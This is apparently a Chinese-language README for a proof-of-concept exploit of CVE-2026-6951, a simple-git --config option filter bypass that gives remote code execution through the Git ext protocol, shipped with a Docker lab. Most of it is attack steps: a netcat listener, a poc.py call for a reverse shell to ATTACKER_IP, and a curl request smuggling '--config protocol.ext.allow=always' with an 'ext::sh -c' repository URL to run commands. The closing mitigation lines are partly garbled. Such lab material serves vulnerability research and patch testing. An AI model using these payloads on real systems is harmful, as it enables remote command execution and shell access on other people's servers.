
CVE-2026-6951 的概念验证漏洞利用,该漏洞是 simple-git 的 --config 过滤器绕过,可通过 Git ext 协议实现 RCE,附带 Docker 实验环境和反向 shell 载荷。
★ CVE-2026-6951 simple-git --config 选项过滤器绕过 RCE PoC ★
https://github.com/user-attachments/assets/4c992530-c5bb-4ff4-be5d-af0857eebb67
CVE-2026-6951 是
simple-git中的一个远程代码执行漏洞,由 CVE-2022-25912 的不完整修复导致。尽管-c选项已被阻止,但等效的--config选项未被正确限制。能够控制 Git 参数的攻击者可以启用ext协议,并通过ext::仓库 URL 执行任意命令。
| 类别 | 版本 |
|---|---|
| 存在漏洞 | simple-git 3.36.0 之前的版本 |
| 已修复 | simple-git 3.36.0 或更高版本 |
此环境使用 simple-git 3.35.2 和 @simple-git/argv-parser 1.0.3。
构建并运行存在漏洞的环境。
docker build -t cve-2026-6951 .
docker run --rm -d --name cve-2026-6951 -p 9107:9107 cve-2026-6951
访问服务地址:
http://127.0.0.1:9107
检查服务状态。
curl -s http://127.0.0.1:9107/api/health
内置的示例仓库位于:
file:///srv/git/sample.git
在攻击者系统上启动监听器。
nc -lvnp 4444
运行漏洞利用脚本。
python3 poc.py http://127.0.0.1:9107 --lhost ATTACKER_IP --lport 4444
以下请求通过滥用未受限的 --config 选项和 Git ext 协议执行 id 命令。
curl -s -X POST http://127.0.0.1:9107/api/import \
-H 'Content-Type: application/json' \
--data-raw '{
"repository":"ext::sh -c id% >&2",
"name":"id-check",
"options":["--config","protocol.ext.allow=always"],
"environment":{}
}'
simple-git 升级到 3.36.0 或更高版本。simple-git。ext:: URL。